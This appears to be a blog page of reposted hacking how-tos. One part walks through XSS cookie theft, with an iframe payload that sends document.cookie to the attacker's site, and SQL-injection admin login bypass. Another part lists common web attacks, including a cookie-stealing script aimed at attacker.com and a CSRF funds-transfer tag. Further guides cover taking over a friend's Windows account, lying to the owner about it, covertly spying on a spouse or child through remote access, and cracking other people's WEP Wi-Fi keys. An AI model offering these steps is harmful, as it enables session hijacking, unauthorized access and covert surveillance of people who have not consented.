Right Knowledge Search

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Monday, 3 March 2014

4 Basic ways How to Hack a Website


Edited by Teresa, Anonymo, Puddy, Blizzerand and 29 others
Please Note: This 'How To' is strictly for educational purposes only, either to help people begin to learn whitehat hacking or to see how hackers work in order to protect their own sites better. This tutorial will provide you with the steps on how to gain access to many low security websites.

Method 1 of 3: Using Cross Site Scripting

  1. 1
    Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work.
    Ad
  2. 2
    Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
    • You’ll want to test to see if the system filters out code. Post <script...>alert(“test”)</...script> (but remove the “…”). If an alert box appears when you click on your post, then the site is vulnerable to attack.
  3. 3
    Create and upload your cookie catcher. The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins. You’ll need a cookie catcher, which will capture your target’s cookies and reroute them. Upload the catcher to a website you have access to and that supports php. An example cookie catcher code can be found in the sample section.
  4. 4
    Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
    • An example code would look like <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (but remove the ...).
  5. 5
    Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

Method 2 of 3: Executing Injection Attacks

  1. 1
    Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching Google for admin login.asp.
  2. 2
    Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1’or’1’=’1.
  3. 3
    Be patient. This is probably going to require a little trial and error.
  4. 4
    Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack.

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE


Ways Hackers Hack Your Site
Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?
They’ve all been recently hacked.
Yes, hacking is a growing threat for every business both large and small.
Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time.
Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.
In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID=’” + request.getParameter(“id”) +”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ’1′=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.
For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:
(String) page += “<input name=’creditcard’ type=’TEXT’ value=’” + request.getParameter(“CC”) + “‘>”;
The attacker modifies the ‘CC’ parameter in their browser to:
‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’
This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.
Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).
If a hacker exploits the authentication and session management system, they can assume the user’s identity.
Scary indeed.
Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:
  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?
If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.
Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.
For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:
And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.
Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.
This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.
In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.
It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.
The problem, of course, is that you’re not getting into what you think you’re getting into.
A classic example of a social engineering attack is the “Microsoft tech support” scam.
This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.
Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.
If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.
In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.
In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.
In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:
<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />
In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.
Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
The following vulnerable components were downloaded 22 million times in 2011:
By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.
And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.
It’s kind of like having your car stolen when you really need to get somewhere fast.
The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.
The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

Tuesday, 25 February 2014

How to Hack a Password Protected Computer Account + Prank

 

(For Windows) Do you want to pull a computer prank on a friend but their account is password protected? Fear not because this easy step-by-step how-to guide will help you hack into their personal account and give you the choice to either remove the password or change it. That combined with another prank may make your friend frustrated and confused, but will hopefully leave them laughing along with you afterwards.

Steps

  1. 1
    Restart your computer and once it restarts, keep pressing F8 on your keyboard until your computer screen shows a list of options to boot your computer.
    Ad
  2. 2
    Scroll up using the up key on your keyboard to “Safe Mode,” which should be the first option on the list.
  3. 3
    After a few moments, the start-up menu will appear and there will be a new account labeled “Administrator.”
  4. 4
    Click on “Administrator” and once the computer logs onto the account, press “Start Menu.”
  5. 5
    Open “Control Panel” and click on “User Accounts.”
  6. 6
    Click “User Accounts” again and now click on your friend’s account from the list of given accounts.
  7. 7
    You can change the password of your friend’s account by clicking on “Change the Password” and then entering a new password or you can remove the password by selecting, “Remove the Password.”
  8. 8
    Restart your computer again and this time let it load to the start-up menu.Click on your friend’s account and now it’s time for the prank!

 

Prank

 

  1. 1
    The first step of this prank is to clear all your icons (or the ones you want) from your desktop. To do so, create a new folder and label it whatever you like.
  2. 2
    Now press “Prt Scr” on your keyboard to take a picture of your desktop.
  3. 3
    Open “Paint” (located in “Accessories”) and paste the picture. Save the file in following path C:\windows\web\wallpaper.
  4. 4
    Go back to your desktop and drag the icons into the folder you created in step 1, remove folder from desktop and place it somewhere else and right click desktop and uncheck show desktop icon option. this will remove all icons and files from the desktop.
  5. 5
    Now right click on your desktop and go to “Properties.” Go to “Desktop” and browse for the file you created. Once you have found it, select “Ok.”
  6. 6
    And last but not least, right click on the taskbar and go to “Properties”. Then the second box which says "Auto-hide the taskbar"
  7. 7
    Congratulations! Now all you have to do is sit back and enjoy the look on your friend’s face when he/she tries to figure out what’s going on

How to Hack a Computer

  

Hacking a computer is a useful and, at times, important skill to pick up. Below are instructions for getting past a password (if you find yourself logged out of a computer or want to check up on your child or spouse), gaining remote access to a computer (to check on a user or help locate a stolen machine), or crack a wifi password (in the event of an emergency, such as if you become lost in an unfamiliar city and you need to look up directions
 
 
 

 

 
Method 1 of 3: Getting Past a Log In Password

 

  1. 1
    Boot the computer in safe mode.
     
    Ad
     
  2. 2
    Click “Start”.
     
  3. 3
    Click “Run”.
     
  4. 4
    Type in “control userpasswords2”.[1]
     
  5. 5
    Change passwords for any account. This is probably going to be obvious to the user, so you may have to tell them a little white lie. Try something along the lines of: "Oh, I hear computers glitch like that sometimes. You can always type in recoverpassword if you get locked out and then set a new password" (in which case you will want to set the password to the account to recoverpassword or whatever you tell this person).[2]
     
  6. 6
    Reboot the computer.
     
 

 

 
Method 2 of 3: Getting Remote Access

 

  1. 1
    Download the program LogMeIn. There is a free version, though you can purchase a subscription if that better meets your needs.[3]
    • The program will need to be downloaded to the computer you intend to remotely view or use. This makes it useful for gaining access to your computer if it is stolen or for checking up on your teen’s daytime activities during the summer.
    • You will have to make an account with the LogMeIn website in order to use the software.
     
  2. 2
    Log in to the website. Log in to LogMeIn’s website.
     
  3. 3
    Navigate to the “My Computers” page. It should open automatically when you sign in.
     
  4. 4
    Add the computer you intend to remotely access. You will see an “Add computer” button on the page. Click that and fill in the info for the computer you intend to access.
     
  5. 5
    Click the name for the computer once it’s added.
     
  6. 6
    Log on to the computer. This means you’ll have to know the username and password for the account you’re trying to access or view.
     
  7. 7
    Click “Remote Control”. If you’re trying to be sneaky (such as to spy on the user), try to move the mouse as little as possible and don’t click on anything.
     
  8. 8
    Log out when you’re done.
     
 

 

 
Method 3 of 3: Cracking a Wifi (WEP) Password

 

  1. 1
    Download the necessary programs. You will need 2 programs to make this hack work: CommView (which will be used to look for vulnerabilities in the network you’re trying to access[4]) and AirCrackNG (which will break the security key itself)
    • Make sure your computer’s wireless adaptor is compatible with CommView.
     
  2. 2
    Find a Network. Use CommView to scan for wireless networks. Choose a network with a WEP key and a decent signal.
     
  3. 3
    Filter the search to that network. Right click on the network you want to access, select “Copy MAC address”, go to the Rules tab, then MAC Addresses, enable MAC address rules, then click Action→Capture→Add Record→Both. Paste in the MAC address.
     
  4. 4
    View Data packets. Sort out the Management (M) and Control (C ) packets so that you are only viewing the Data (D) packets.
     
  5. 5
    Save the packets. Go to the Logging tab and enable auto saving. You may need to change the settings on the Directory size and File size. Try 2000 and 20, respectively.
     
  6. 6
    Press the “Play” button to begin collecting. Wait until you have at least 100,000 packets.
     
  7. 7
    Click “Concatenate Logs” under the Log tab. Make sure all of the logs are selected.
     
  8. 8
    Export the logs. Go to the folder where the logs were saved and open the log file. Click File→Export→WireShark/tcpdump format and save it where you can find it easily.
     
  9. 9
    Open the newly created file with Aircrack. Start Aircrack and choose WEP. Open the file and click “Launch”.
     
  10. 10
    Enter the index number. When the command prompt opens, you’ll need to enter the index number for the target network. It is probably 1. Hit enter and wait. If it works, the key will be shown.